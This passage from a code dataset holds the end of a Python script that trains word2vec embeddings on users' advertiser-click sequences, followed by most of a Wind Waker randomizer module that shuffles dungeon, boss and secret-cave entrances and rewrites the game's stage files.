18:42:42 2020\n\n@author: Alamo\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport gensim\nfrom gensim.models.word2vec import Word2Vec\n\npath = '../data/'\ntrain_ad_df = pd.read_csv(path+'train_preliminary/ad.csv', usecols=['creative_id', 'advertiser_id'])\ntest_ad_df = pd.read_csv(path+'test/ad.csv', usecols=['creative_id', 'ad_id'])\nwhole_ad_df = pd.concat([train_ad_df, test_ad_df])\nwhole_ad_df = whole_ad_df.drop_duplicates(subset=['creative_id'], keep='first')\ndel train_ad_df, test_ad_df\n\ntrain_click_df = pd.read_csv(path+'train_preliminary/click_log.csv', usecols=['time', 'user_id', 'creative_id'])\ntest_click_df = pd.read_csv(path+'test/click_log.csv', usecols=['time', 'user_id', 'creative_id'])\nwhole_click_df = pd.concat([train_click_df, test_click_df])\n#经分析, 并无重复记录\n#whole_click_df = whole_click_df.drop_duplicates(subset=['time', 'user_id', 'creative_id'], keep='first')\ndel train_click_df, test_click_df, whole_click_df['time']\n\nwhole_click_ad_df = pd.merge(whole_click_df, whole_ad_df, how='left', on='creative_id')\n\n#提取用户点击的广告序列, 并构成文本\ndoc = whole_click_ad_df.groupby(['user_id'])['advertiser_id'].agg({list}).reset_index()\ndocument = doc['list'].values.tolist()\n\n#转为字符串型才能进行训练\ntexts = [[str(word) for word in doc] for doc in document]\n\nrandom_seed = 2020\nw2v_model = Word2Vec(texts, size=128, window=5, min_count=1, workers=12, sg=1, iter=10, seed=random_seed)\nw2v_model.wv.save_word2vec_format('./word2vec_model/advertiserid_w2v_128.txt')\ndel texts\n\n\n\ndef get_w2v_avg(doc, w2v_out_path, word2vec_Path):\n w2v_dim = 128\n\n model = gensim.models.KeyedVectors.load_word2vec_format(\n word2vec_Path, binary=False)\n vacab = model.vocab.keys()\n\n w2v_feature = np.zeros((len(doc), w2v_dim))\n w2v_feature_avg = np.zeros((len(doc), w2v_dim))\n\n for i, line in enumerate(doc['list']):\n num = 0\n if line == '':\n w2v_feature_avg[i, :] = np.zeros(w2v_dim)\n else:\n for word in line:\n num += 1\n vec = model[str(word)] if str(word) in vacab else np.zeros(w2v_dim)\n w2v_feature[i, :] += vec\n w2v_feature_avg[i, :] = w2v_feature[i, :] / num\n w2v_avg = pd.DataFrame(w2v_feature_avg)\n w2v_avg.columns = ['w2v_avg_' + str(i) for i in range(1, w2v_dim+1)]\n w2v_avg['user_id'] = doc['user_id']\n w2v_avg.set_index(keys=['user_id'], inplace=True)\n w2v_avg.to_csv(w2v_out_path, encoding='utf-8', index=None)\n return w2v_avg\n\n\nw2v_feat = get_w2v_avg(doc, path+'feature/adid_w2v_avg_feature.csv', './word2vec_model/advertiserid_w2v_128.txt')\n","sub_path":"LGB_Frame/get_feature/get_feature_w2v_advertiserid.py","file_name":"get_feature_w2v_advertiserid.py","file_ext":"py","file_size_in_byte":2692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"312157763","text":"from dataclasses import dataclass\n\nfrom wwlib.dzx import DZx, _2DMA, ACTR, PLYR, SCLS\nfrom wwlib.events import EventList\n\n@dataclass(frozen=True)\nclass ZoneEntrance:\n stage_name: str\n room_num: int\n scls_exit_index: int\n spawn_id: int\n entrance_name: str\n island_name: str = None\n warp_out_stage_name: str = None\n warp_out_room_num: int = None\n warp_out_spawn_id: int = None\n \n @property\n def is_nested(self):\n return self.island_name is None\n\nDUNGEON_ENTRANCES = [\n ZoneEntrance(\"Adanmae\", 0, 2, 2, \"Dungeon Entrance on Dragon Roost Island\", \"Dragon Roost Island\", \"sea\", 13, 211),\n ZoneEntrance(\"sea\", 41, 6, 6, \"Dungeon Entrance in Forest Haven Sector\", \"Forest Haven\", \"Omori\", 0, 215),\n ZoneEntrance(\"sea\", 26, 0, 2, \"Dungeon Entrance in Tower of the Gods Sector\", \"Tower of the Gods\", \"sea\", 26, 1),\n ZoneEntrance(\"Edaichi\", 0, 0, 1, \"Dungeon Entrance on Headstone Island\", \"Headstone Island\", \"sea\", 45, 229),\n ZoneEntrance(\"Ekaze\", 0, 0, 1, \"Dungeon Entrance on Gale Isle\", \"Gale Isle\", \"sea\", 4, 232),\n]\nBOSS_ENTRANCES = [\n ZoneEntrance(\"M_NewD2\", 10, 1, 27, \"Boss Entrance in Dragon Roost Cavern\"),\n ZoneEntrance(\"kindan\", 16, 0, 1, \"Boss Entrance in Forbidden Woods\"),\n ZoneEntrance(\"Siren\", 18, 0, 27, \"Boss Entrance in Tower of the Gods\"),\n ZoneEntrance(\"M_Dai\", 15, 0, 27, \"Boss Entrance in Earth Temple\"),\n ZoneEntrance(\"kaze\", 12, 0, 27, \"Boss Entrance in Wind Temple\"),\n]\nSECRET_CAVE_ENTRANCES = [\n ZoneEntrance(\"sea\", 44, 8, 10, \"Secret Cave Entrance on Outset Island\", \"Outset Island\", \"sea\", 44, 10),\n ZoneEntrance(\"sea\", 13, 2, 5, \"Secret Cave Entrance on Dragon Roost Island\", \"Dragon Roost Island\", \"sea\", 13, 5),\n # Note: For Fire Mountain and Ice Ring Isle, the spawn ID specified is on the sea with KoRL instead of being at the cave entrance, since the player would get burnt/frozen if they were put at the entrance while the island is still active.\n ZoneEntrance(\"sea\", 20, 0, 0, \"Secret Cave Entrance on Fire Mountain\", \"Fire Mountain\", \"sea\", 20, 0),\n ZoneEntrance(\"sea\", 40, 0, 0, \"Secret Cave Entrance on Ice Ring Isle\", \"Ice Ring Isle\", \"sea\", 40, 0),\n ZoneEntrance(\"Abesso\", 0, 1, 1, \"Secret Cave Entrance on Private Oasis\", \"Private Oasis\", \"Abesso\", 0, 1),\n ZoneEntrance(\"sea\", 29, 0, 5, \"Secret Cave Entrance on Needle Rock Isle\", \"Needle Rock Isle\", \"sea\", 29, 5),\n ZoneEntrance(\"sea\", 47, 1, 5, \"Secret Cave Entrance on Angular Isles\", \"Angular Isles\", \"sea\", 47, 5),\n ZoneEntrance(\"sea\", 48, 0, 5, \"Secret Cave Entrance on Boating Course\", \"Boating Course\", \"sea\", 48, 5),\n ZoneEntrance(\"sea\", 31, 0, 1, \"Secret Cave Entrance on Stone Watcher Island\", \"Stone Watcher Island\", \"sea\", 31, 1),\n ZoneEntrance(\"sea\", 7, 0, 1, \"Secret Cave Entrance on Overlook Island\", \"Overlook Island\", \"sea\", 7, 1),\n ZoneEntrance(\"sea\", 35, 0, 1, \"Secret Cave Entrance on Bird's Peak Rock\", \"Bird's Peak Rock\", \"sea\", 35, 1),\n ZoneEntrance(\"sea\", 12, 0, 1, \"Secret Cave Entrance on Pawprint Isle\", \"Pawprint Isle\", \"sea\", 12, 1),\n ZoneEntrance(\"sea\", 12, 1, 5, \"Secret Cave Entrance on Pawprint Isle Side Isle\", \"Pawprint Isle\", \"sea\", 12, 5),\n ZoneEntrance(\"sea\", 36, 0, 1, \"Secret Cave Entrance on Diamond Steppe Island\", \"Diamond Steppe Island\", \"sea\", 36, 1),\n ZoneEntrance(\"sea\", 34, 0, 1, \"Secret Cave Entrance on Bomb Island\", \"Bomb Island\", \"sea\", 34, 1),\n ZoneEntrance(\"sea\", 16, 0, 1, \"Secret Cave Entrance on Rock Spire Isle\", \"Rock Spire Isle\", \"sea\", 16, 1),\n ZoneEntrance(\"sea\", 38, 0, 5, \"Secret Cave Entrance on Shark Island\", \"Shark Island\", \"sea\", 38, 5),\n ZoneEntrance(\"sea\", 42, 0, 2, \"Secret Cave Entrance on Cliff Plateau Isles\", \"Cliff Plateau Isles\", \"sea\", 42, 2),\n ZoneEntrance(\"sea\", 43, 0, 5, \"Secret Cave Entrance on Horseshoe Island\", \"Horseshoe Island\", \"sea\", 43, 5),\n ZoneEntrance(\"sea\", 2, 0, 1, \"Secret Cave Entrance on Star Island\", \"Star Island\", \"sea\", 2, 1),\n]\nALL_ENTRANCES = \\\n DUNGEON_ENTRANCES + \\\n BOSS_ENTRANCES + \\\n SECRET_CAVE_ENTRANCES\n\n@dataclass(frozen=True)\nclass ZoneExit:\n stage_name: str\n room_num: int\n scls_exit_index: int\n spawn_id: int\n zone_name: str\n unique_name: str\n boss_stage_name: str = None\n\nDUNGEON_EXITS = [\n ZoneExit(\"M_NewD2\", 0, 0, 0, \"Dragon Roost Cavern\", \"Dragon Roost Cavern\", \"M_DragB\"),\n ZoneExit(\"kindan\", 0, 0, 0, \"Forbidden Woods\", \"Forbidden Woods\", \"kinBOSS\"),\n ZoneExit(\"Siren\", 0, 1, 0, \"Tower of the Gods\", \"Tower of the Gods\", \"SirenB\"),\n ZoneExit(\"M_Dai\", 0, 0, 0, \"Earth Temple\", \"Earth Temple\", \"M_DaiB\"),\n ZoneExit(\"kaze\", 15, 0, 15, \"Wind Temple\", \"Wind Temple\", \"kazeB\"),\n]\nBOSS_EXITS = [\n ZoneExit(\"M_DragB\", 0, 0, 0, \"Gohma Boss Arena\", \"Gohma Boss Arena\"),\n ZoneExit(\"kinBOSS\", 0, 0, 0, \"Kalle Demos Boss Arena\", \"Kalle Demos Boss Arena\"),\n ZoneExit(\"SirenB\", 0, 0, 0, \"Gohdan Boss Arena\", \"Gohdan Boss Arena\"),\n ZoneExit(\"M_DaiB\", 0, 0, 0, \"Jalhalla Boss Arena\", \"Jalhalla Boss Arena\"),\n ZoneExit(\"kazeB\", 0, 0, 0, \"Molgera Boss Arena\", \"Molgera Boss Arena\"),\n]\nSECRET_CAVE_EXITS = [\n ZoneExit(\"Cave09\", 0, 1, 0, \"Outset Island\", \"Savage Labyrinth\"),\n ZoneExit(\"TF_06\", 0, 0, 0, \"Dragon Roost Island\", \"Dragon Roost Island Secret Cave\"),\n ZoneExit(\"MiniKaz\", 0, 0, 0, \"Fire Mountain\", \"Fire Mountain Secret Cave\"),\n ZoneExit(\"MiniHyo\", 0, 0, 0, \"Ice Ring Isle\", \"Ice Ring Isle Secret Cave\"),\n ZoneExit(\"TF_04\", 0, 0, 0, \"Private Oasis\", \"Cabana Labyrinth\"),\n ZoneExit(\"SubD42\", 0, 0, 0, \"Needle Rock Isle\", \"Needle Rock Isle Secret Cave\"),\n ZoneExit(\"SubD43\", 0, 0, 0, \"Angular Isles\", \"Angular Isles Secret Cave\"),\n ZoneExit(\"SubD71\", 0, 0, 0, \"Boating Course\", \"Boating Course Secret Cave\"),\n ZoneExit(\"TF_01\", 0, 0, 0, \"Stone Watcher Island\", \"Stone Watcher Island Secret Cave\"),\n ZoneExit(\"TF_02\", 0, 0, 0, \"Overlook Island\", \"Overlook Island Secret Cave\"),\n ZoneExit(\"TF_03\", 0, 0, 0, \"Bird's Peak Rock\", \"Bird's Peak Rock Secret Cave\"),\n ZoneExit(\"TyuTyu\", 0, 0, 0, \"Pawprint Isle\", \"Pawprint Isle Chuchu Cave\"),\n ZoneExit(\"Cave07\", 0, 0, 0, \"Pawprint Isle Side Isle\", \"Pawprint Isle Wizzrobe Cave\"),\n ZoneExit(\"WarpD\", 0, 0, 0, \"Diamond Steppe Island\", \"Diamond Steppe Island Warp Maze Cave\"),\n ZoneExit(\"Cave01\", 0, 0, 0, \"Bomb Island\", \"Bomb Island Secret Cave\"),\n ZoneExit(\"Cave04\", 0, 0, 0, \"Rock Spire Isle\", \"Rock Spire Isle Secret Cave\"),\n ZoneExit(\"ITest63\", 0, 0, 0, \"Shark Island\", \"Shark Island Secret Cave\"),\n ZoneExit(\"Cave03\", 0, 0, 0, \"Cliff Plateau Isles\", \"Cliff Plateau Isles Secret Cave\"),\n ZoneExit(\"Cave05\", 0, 0, 0, \"Horseshoe Island\", \"Horseshoe Island Secret Cave\"),\n ZoneExit(\"Cave02\", 0, 0, 0, \"Star Island\", \"Star Island Secret Cave\"),\n]\nALL_EXITS = \\\n DUNGEON_EXITS + \\\n BOSS_EXITS + \\\n SECRET_CAVE_EXITS\n\nDUNGEON_ENTRANCE_NAMES_WITH_NO_REQUIREMENTS = [\n \"Dungeon Entrance on Dragon Roost Island\",\n]\nSECRET_CAVE_ENTRANCE_NAMES_WITH_NO_REQUIREMENTS = [\n \"Secret Cave Entrance on Pawprint Isle\",\n \"Secret Cave Entrance on Cliff Plateau Isles\",\n]\n\nDUNGEON_EXIT_NAMES_WITH_NO_REQUIREMENTS = [\n \"Dragon Roost Cavern\",\n]\nPUZZLE_SECRET_CAVE_EXIT_NAMES_WITH_NO_REQUIREMENTS = [\n \"Pawprint Isle Chuchu Cave\",\n \"Ice Ring Isle Secret Cave\",\n \"Bird's Peak Rock Secret Cave\", # Technically this has requirements, but it's just Wind Waker+Wind's Requiem.\n \"Diamond Steppe Island Warp Maze Cave\",\n]\nCOMBAT_SECRET_CAVE_EXIT_NAMES_WITH_NO_REQUIREMENTS = [\n \"Rock Spire Isle Secret Cave\",\n]\n\nITEM_LOCATION_NAME_TO_EXIT_ZONE_NAME_OVERRIDES = {\n \"Pawprint Isle - Wizzrobe Cave\": \"Pawprint Isle Side Isle\",\n \"Dragon Roost Cavern - Gohma Heart Container\": \"Gohma Boss Arena\",\n \"Forbidden Woods - Kalle Demos Heart Container\": \"Kalle Demos Boss Arena\",\n \"Tower of the Gods - Gohdan Heart Container\": \"Gohdan Boss Arena\",\n \"Earth Temple - Jalhalla Heart Container\": \"Jalhalla Boss Arena\",\n \"Wind Temple - Molgera Heart Container\": \"Molgera Boss Arena\",\n}\n\n# TODO: Maybe make a separate list of entrances and exits that have no requirements when you start with a sword. (e.g. Cliff Plateau Isles Secret Cave.) Probably not necessary though.\n\ndef randomize_entrances(self):\n if self.options.get(\"randomize_entrances\") == \"Dungeons\":\n randomize_one_set_of_entrances(self, include_dungeons=True)\n elif self.options.get(\"randomize_entrances\") == \"Nested Dungeons\":\n randomize_one_set_of_entrances(self, include_dungeons=True, include_bosses=True)\n elif self.options.get(\"randomize_entrances\") == \"Secret Caves\":\n randomize_one_set_of_entrances(self, include_caves=True)\n elif self.options.get(\"randomize_entrances\") == \"Dungeons & Secret Caves (Separately)\":\n randomize_one_set_of_entrances(self, include_dungeons=True)\n randomize_one_set_of_entrances(self, include_caves=True)\n elif self.options.get(\"randomize_entrances\") == \"Nested Dungeons & Secret Caves (Separately)\":\n randomize_one_set_of_entrances(self, include_dungeons=True, include_bosses=True)\n randomize_one_set_of_entrances(self, include_caves=True)\n elif self.options.get(\"randomize_entrances\") == \"Dungeons & Secret Caves (Together)\":\n randomize_one_set_of_entrances(self, include_dungeons=True, include_caves=True)\n elif self.options.get(\"randomize_entrances\") == \"Nested Dungeons & Secret Caves (Together)\":\n randomize_one_set_of_entrances(self, include_dungeons=True, include_bosses=True, include_caves=True)\n else:\n raise Exception(\"Invalid entrance randomizer option: %s\" % self.options.get(\"randomize_entrances\"))\n\ndef randomize_one_set_of_entrances(self, include_dungeons=False, include_bosses=False, include_caves=False):\n relevant_entrances: list[ZoneEntrance] = []\n relevant_exits: list[ZoneExit] = []\n if include_dungeons:\n relevant_entrances += DUNGEON_ENTRANCES\n relevant_exits += DUNGEON_EXITS\n if include_bosses:\n relevant_entrances += BOSS_ENTRANCES\n relevant_exits += BOSS_EXITS\n if include_caves:\n relevant_entrances += SECRET_CAVE_ENTRANCES\n relevant_exits += SECRET_CAVE_EXITS\n \n remaining_exits = relevant_exits.copy()\n self.rng.shuffle(relevant_entrances)\n \n doing_progress_entrances_for_dungeons_and_caves_only_start = False\n if self.dungeons_and_caves_only_start:\n if include_dungeons and self.options.get(\"progression_dungeons\"):\n doing_progress_entrances_for_dungeons_and_caves_only_start = True\n if include_caves and (self.options.get(\"progression_puzzle_secret_caves\") \\\n or self.options.get(\"progression_combat_secret_caves\") \\\n or self.options.get(\"progression_savage_labyrinth\")):\n doing_progress_entrances_for_dungeons_and_caves_only_start = True\n \n if self.options.get(\"race_mode\"):\n # Move entrances that are on islands with multiple entrances to the start of the list.\n # This is because we need to prevent these islands from having multiple dungeons on them in Race Mode, and this can fail if they're not at the start of the list because it's possible for the only possibility left to be to put multiple dungeons on one island.\n entrances_not_on_unique_islands = []\n for zone_entrance in relevant_entrances:\n for other_zone_entrance in relevant_entrances:\n if other_zone_entrance.island_name == zone_entrance.island_name and other_zone_entrance != zone_entrance:\n entrances_not_on_unique_islands.append(zone_entrance)\n break\n for zone_entrance in entrances_not_on_unique_islands:\n relevant_entrances.remove(zone_entrance)\n relevant_entrances = entrances_not_on_unique_islands + relevant_entrances\n \n if doing_progress_entrances_for_dungeons_and_caves_only_start:\n # If the player can't access any locations at the start besides dungeon/cave entrances, we choose an entrance with no requirements that will be the first place the player goes.\n # We will make this entrance lead to a dungeon/cave with no requirements so the player can actually get an item at the start.\n \n entrance_names_with_no_requirements = []\n if self.options.get(\"progression_dungeons\"):\n entrance_names_with_no_requirements += DUNGEON_ENTRANCE_NAMES_WITH_NO_REQUIREMENTS\n if self.options.get(\"progression_puzzle_secret_caves\") \\\n or self.options.get(\"progression_combat_secret_caves\") \\\n or self.options.get(\"progression_savage_labyrinth\"):\n entrance_names_with_no_requirements += SECRET_CAVE_ENTRANCE_NAMES_WITH_NO_REQUIREMENTS\n \n exit_names_with_no_requirements = []\n if self.options.get(\"progression_dungeons\"):\n exit_names_with_no_requirements += DUNGEON_EXIT_NAMES_WITH_NO_REQUIREMENTS\n if self.options.get(\"progression_puzzle_secret_caves\"):\n exit_names_with_no_requirements += PUZZLE_SECRET_CAVE_EXIT_NAMES_WITH_NO_REQUIREMENTS\n if self.options.get(\"progression_combat_secret_caves\"):\n exit_names_with_no_requirements += COMBAT_SECRET_CAVE_EXIT_NAMES_WITH_NO_REQUIREMENTS\n # No need to check progression_savage_labyrinth, since neither of the items inside Savage have no requirements.\n \n possible_safety_entrances = [\n e for e in relevant_entrances\n if e.entrance_name in entrance_names_with_no_requirements\n ]\n safety_entrance = self.rng.choice(possible_safety_entrances)\n \n # In order to avoid using up all dungeons/caves with no requirements, we have to do this entrance first, so move it to the start of the array.\n relevant_entrances.remove(safety_entrance)\n relevant_entrances.insert(0, safety_entrance)\n \n done_entrances_to_exits: dict[ZoneEntrance, ZoneExit] = {}\n done_exits_to_entrances: dict[ZoneExit, ZoneEntrance] = {}\n while relevant_entrances:\n zone_entrance = relevant_entrances.pop(0)\n outermost_entrance = get_outermost_entrance_for_entrance(zone_entrance, done_exits_to_entrances)\n if outermost_entrance is None:\n # Boss entrance that isn't yet accessible from the sea in any way.\n # We don't want to connect this to anything yet or we risk creating an infinite loop.\n # So postpone it until the end.\n relevant_entrances.append(zone_entrance)\n continue\n \n if doing_progress_entrances_for_dungeons_and_caves_only_start and zone_entrance == safety_entrance:\n possible_remaining_exits = [e for e in remaining_exits if e.unique_name in exit_names_with_no_requirements]\n else:\n possible_remaining_exits = remaining_exits\n \n if any(e for e in possible_remaining_exits if e in DUNGEON_EXITS):\n # Only start placing boss exits after all dungeon exits have been placed.\n possible_remaining_exits = [e for e in remaining_exits if e not in BOSS_EXITS]\n \n # The below is debugging code for testing the caves with timers.\n #if zone_entrance.entrance_name == \"Secret Cave Entrance on Fire Mountain\":\n # possible_remaining_exits = [\n # x for x in remaining_exits\n # if x.unique_name == \"Ice Ring Isle Secret Cave\"\n # ]\n #elif zone_entrance.entrance_name == \"Secret Cave Entrance on Ice Ring Isle\":\n # possible_remaining_exits = [\n # x for x in remaining_exits\n # if x.unique_name == \"Fire Mountain Secret Cave\"\n # ]\n #else:\n # possible_remaining_exits = [\n # x for x in remaining_exits\n # if x.unique_name not in [\"Fire Mountain Secret Cave\", \"Ice Ring Isle Secret Cave\"]\n # ]\n \n if self.options.get(\"race_mode\"):\n # Prevent two entrances on the same island both leading into dungeons (DRC and Pawprint each have two entrances).\n # This is because Race Mode's dungeon markers only tell you what island required dungeons are on, not which of the two entrances it's in. So if a required dungeon and a non-required dungeon were on the same island there would be no way to tell which is required.\n done_entrances_on_same_island_leading_to_a_dungeon = [\n entr for entr in done_entrances_to_exits\n if entr.island_name == zone_entrance.island_name\n and done_entrances_to_exits[entr] in DUNGEON_EXITS\n ]\n if done_entrances_on_same_island_leading_to_a_dungeon:\n possible_remaining_exits = [\n ex for ex in possible_remaining_exits\n if ex not in DUNGEON_EXITS + BOSS_EXITS\n ]\n \n if not possible_remaining_exits:\n raise Exception(f\"No valid exits to place for entrance: {zone_entrance.entrance_name}\")\n zone_exit = self.rng.choice(possible_remaining_exits)\n remaining_exits.remove(zone_exit)\n \n self.entrance_connections[zone_entrance.entrance_name] = zone_exit.unique_name\n done_entrances_to_exits[zone_entrance] = zone_exit\n done_exits_to_entrances[zone_exit] = zone_entrance\n \n self.logic.update_entrance_connection_macros()\n \n for zone_exit, zone_entrance in done_exits_to_entrances.items():\n outermost_entrance = get_outermost_entrance_for_exit(zone_exit, done_exits_to_entrances)\n \n self.dungeon_and_cave_island_locations[zone_exit.zone_name] = outermost_entrance.island_name\n \n if not self.dry_run:\n update_entrance_to_lead_to_exit(self, zone_entrance, zone_exit, outermost_entrance)\n \n if include_bosses:\n for boss_exit in BOSS_EXITS:\n if not self.dry_run:\n outermost_entrance = get_outermost_entrance_for_exit(boss_exit, done_exits_to_entrances)\n update_boss_warp_out_destination(self, boss_exit.stage_name, outermost_entrance)\n elif include_dungeons:\n for dungeon_exit in DUNGEON_EXITS:\n outermost_entrance = done_exits_to_entrances[dungeon_exit]\n \n if not self.dry_run:\n update_boss_warp_out_destination(self, dungeon_exit.boss_stage_name, outermost_entrance)\n \n # Update the boss exit's island even when nested dungeon randomization is disabled.\n boss_exit = next(\n zone_exit for zone_exit in BOSS_EXITS\n if zone_exit.stage_name == dungeon_exit.boss_stage_name\n )\n self.dungeon_and_cave_island_locations[boss_exit.zone_name] = outermost_entrance.island_name\n \n # Prepare some data so the spoiler log can display the nesting in terms of paths.\n if include_bosses:\n self.nested_entrance_paths = []\n terminal_exits = [ex for ex in relevant_exits if ex not in DUNGEON_EXITS]\n for terminal_exit in terminal_exits:\n zone_entrance = done_exits_to_entrances[terminal_exit]\n seen_entrances = get_all_entrances_on_path_to_entrance(zone_entrance, done_exits_to_entrances)\n path = [terminal_exit.unique_name]\n for entr in seen_entrances:\n path.append(entr.entrance_name)\n path.reverse()\n self.nested_entrance_paths.append(path)\n\ndef get_outermost_entrance_for_exit(zone_exit: ZoneExit, done_exits_to_entrances):\n \"\"\" Unrecurses nested dungeons to determine what the outermost (island) entrance is for a given exit.\"\"\"\n zone_entrance = done_exits_to_entrances[zone_exit]\n return get_outermost_entrance_for_entrance(zone_entrance, done_exits_to_entrances)\n\ndef get_outermost_entrance_for_entrance(zone_entrance: ZoneEntrance, done_exits_to_entrances):\n \"\"\" Unrecurses nested dungeons to determine what the outermost (island) entrance is for a given entrance.\"\"\"\n seen_entrances = get_all_entrances_on_path_to_entrance(zone_entrance, done_exits_to_entrances)\n if seen_entrances is None:\n return None\n outermost_entrance = seen_entrances[-1]\n return outermost_entrance\n\ndef get_all_entrances_on_path_to_entrance(zone_entrance: ZoneEntrance, done_exits_to_entrances):\n \"\"\" Unrecurses nested dungeons to build a list of all entrances leading to a given entrance.\"\"\"\n seen_entrances = []\n while zone_entrance.is_nested:\n if zone_entrance in seen_entrances:\n raise Exception(\"Entrances are in an infinite loop: %s\" % \", \".join([e.entrance_name for e in seen_entrances]))\n seen_entrances.append(zone_entrance)\n dungeon_start_exit = get_dungeon_start_exit_leading_to_nested_entrance(zone_entrance)\n if dungeon_start_exit not in done_exits_to_entrances:\n return None\n zone_entrance = done_exits_to_entrances[dungeon_start_exit]\n seen_entrances.append(zone_entrance)\n return seen_entrances\n\ndef get_dungeon_start_exit_leading_to_nested_entrance(zone_entrance: ZoneEntrance):\n assert zone_entrance.entrance_name.startswith(\"Boss Entrance in \")\n dungeon_name = zone_entrance.entrance_name[len(\"Boss Entrance in \"):]\n dungeon_start_exit = next(ex for ex in DUNGEON_EXITS if ex.unique_name == dungeon_name)\n return dungeon_start_exit\n\ndef update_entrance_to_lead_to_exit(self, zone_entrance: ZoneEntrance, zone_exit: ZoneExit, outermost_entrance: ZoneEntrance):\n # Update the stage this entrance takes you into.\n entrance_dzr_path = \"files/res/Stage/%s/Room%d.arc\" % (zone_entrance.stage_name, zone_entrance.room_num)\n entrance_dzs_path = \"files/res/Stage/%s/Stage.arc\" % (zone_entrance.stage_name)\n entrance_dzr = self.get_arc(entrance_dzr_path).get_file(\"room.dzr\", DZx)\n entrance_dzs = self.get_arc(entrance_dzs_path).get_file(\"stage.dzs\", DZx)\n entrance_scls = entrance_dzr.entries_by_type(SCLS)[zone_entrance.scls_exit_index]\n entrance_scls.dest_stage_name = zone_exit.stage_name\n entrance_scls.room_index = zone_exit.room_num\n entrance_scls.spawn_id = zone_exit.spawn_id\n entrance_scls.save_changes()\n \n exit_dzr_path = \"files/res/Stage/%s/Room%d.arc\" % (zone_exit.stage_name, zone_exit.room_num)\n exit_dzs_path = \"files/res/Stage/%s/Stage.arc\" % zone_exit.stage_name\n \n # Update the DRI spawn to not have spawn type 5.\n # If the DRI entrance was connected to the TotG dungeon, then exiting TotG while riding KoRL would crash the game.\n if len(entrance_dzs.entries_by_type(PLYR)) > 0:\n entrance_spawns = entrance_dzs.entries_by_type(PLYR)\n else:\n entrance_spawns = entrance_dzr.entries_by_type(PLYR)\n entrance_spawn = next(spawn for spawn in entrance_spawns if spawn.spawn_id == zone_entrance.spawn_id)\n if entrance_spawn.spawn_type == 5:\n entrance_spawn.spawn_type = 1\n entrance_spawn.save_changes()\n \n if zone_exit in BOSS_EXITS:\n # Update the spawn you're placed at when saving and reloading inside a boss room.\n exit_dzs = self.get_arc(exit_dzs_path).get_file(\"stage.dzs\", DZx)\n exit_scls = exit_dzs.entries_by_type(SCLS)[zone_exit.scls_exit_index]\n if zone_entrance in BOSS_ENTRANCES:\n # If the end of a dungeon connects to a boss, saving and reloading inside the boss\n # room should put you at the beginning of that dungeon, not the end.\n # But if multiple dungeons are nested we don't take the player all the way back to the\n # beginning of the chain, just to the beginning of the last dungeon.\n dungeon_start_exit = entrance_dzs.entries_by_type(SCLS)[0]\n exit_scls.dest_stage_name = dungeon_start_exit.dest_stage_name\n exit_scls.room_index = dungeon_start_exit.room_index\n exit_scls.spawn_id = dungeon_start_exit.spawn_id\n exit_scls.save_changes()\n else:\n # If a sea entrance connects directly to a boss we put you right outside that entrance.\n exit_scls.dest_stage_name = zone_entrance.stage_name\n exit_scls.room_index = zone_entrance.room_num\n exit_scls.spawn_id = zone_entrance.spawn_id\n exit_scls.save_changes()\n else:\n # Update the entrance you're put at when leaving the dungeon/secret cave.\n exit_dzr = self.get_arc(exit_dzr_path).get_file(\"room.dzr\", DZx)\n exit_scls = exit_dzr.entries_by_type(SCLS)[zone_exit.scls_exit_index]\n exit_scls.dest_stage_name = zone_entrance.stage_name\n exit_scls.room_index = zone_entrance.room_num\n exit_scls.spawn_id = zone_entrance.spawn_id\n exit_scls.save_changes()\n \n # Also update the extra exits when leaving Savage Labyrinth to put you on the correct entrance when leaving.\n if zone_exit.unique_name == \"Savage Labyrinth\":\n for stage_and_room_name in [\"Cave10/Room0\", \"Cave10/Room20\", \"Cave11/Room0\"]:\n savage_dzr_path = \"files/res/Stage/%s.arc\" % stage_and_room_name\n savage_dzr = self.get_arc(savage_dzr_path).get_file(\"room.dzr\", DZx)\n exit_sclses = [x for x in savage_dzr.entries_by_type(SCLS) if x.dest_stage_name == \"sea\"]\n for exit_scls in exit_sclses:\n exit_scls.dest_stage_name = zone_entrance.stage_name\n exit_scls.room_index = zone_entrance.room_num\n exit_scls.spawn_id = zone_entrance.spawn_id\n exit_scls.save_changes()\n \n if zone_exit in SECRET_CAVE_EXITS:\n # Update the sector coordinates in the 2DMA chunk so that save-and-quitting in a secret cave puts you on the correct island.\n exit_dzs = self.get_arc(exit_dzs_path).get_file(\"stage.dzs\", DZx)\n _2dma = exit_dzs.entries_by_type(_2DMA)[0]\n island_number = self.island_name_to_number[outermost_entrance.island_name]\n sector_x = (island_number-1) % 7\n sector_y = (island_number-1) // 7\n _2dma.sector_x = sector_x-3\n _2dma.sector_y = sector_y-3\n _2dma.save_changes()\n \n if zone_exit.unique_name == \"Fire Mountain Secret Cave\":\n actors = exit_dzr.entries_by_type(ACTR)\n kill_trigger = next(x for x in actors if x.name == \"VolTag\")\n if zone_entrance.entrance_name == \"Secret Cave Entrance on Fire Mountain\":\n # Unchanged from vanilla, do nothing.\n pass\n elif zone_entrance.entrance_name == \"Secret Cave Entrance on Ice Ring Isle\":\n # Ice Ring's entrance leads to Fire Mountain's exit.\n # Change the kill trigger on the inside of Fire Mountain to act like the one inside Ice Ring.\n kill_trigger.type = 2\n kill_trigger.save_changes()\n else:\n # An entrance without a timer leads into this cave.\n # Remove the kill trigger actor on the inside, because otherwise it would throw the player out the instant they enter.\n exit_dzr.remove_entity(kill_trigger, ACTR)\n \n if zone_exit.unique_name == \"Ice Ring Isle Secret Cave\":\n actors = exit_dzr.entries_by_type(ACTR)\n kill_trigger = next(x for x in actors if x.name == \"VolTag\")\n if zone_entrance.entrance_name == \"Secret Cave Entrance on Ice Ring Isle\":\n # Unchanged from vanilla, do nothing.\n pass\n elif zone_entrance.entrance_name == \"Secret Cave Entrance on Fire Mountain\":\n # Fire Mountain's entrance leads to Ice Ring's exit.\n # Change the kill trigger on the inside of Ice Ring to act like the one inside Fire Mountain.\n kill_trigger.type = 1\n kill_trigger.save_changes()\n else:\n # An entrance without a timer leads into this cave.\n # Remove the kill trigger actor on the inside, because otherwise it would throw the player out the instant they enter.\n exit_dzr.remove_entity(kill_trigger, ACTR)\n \n if zone_exit.unique_name == \"Ice Ring Isle Secret Cave\":\n # Also update the inner cave of Ice Ring Isle to take you out to the correct entrance as well.\n inner_cave_dzr_path = \"files/res/Stage/ITest62/Room0.arc\"\n inner_cave_dzr = self.get_arc(inner_cave_dzr_path).get_file(\"room.dzr\", DZx)\n inner_cave_exit_scls = 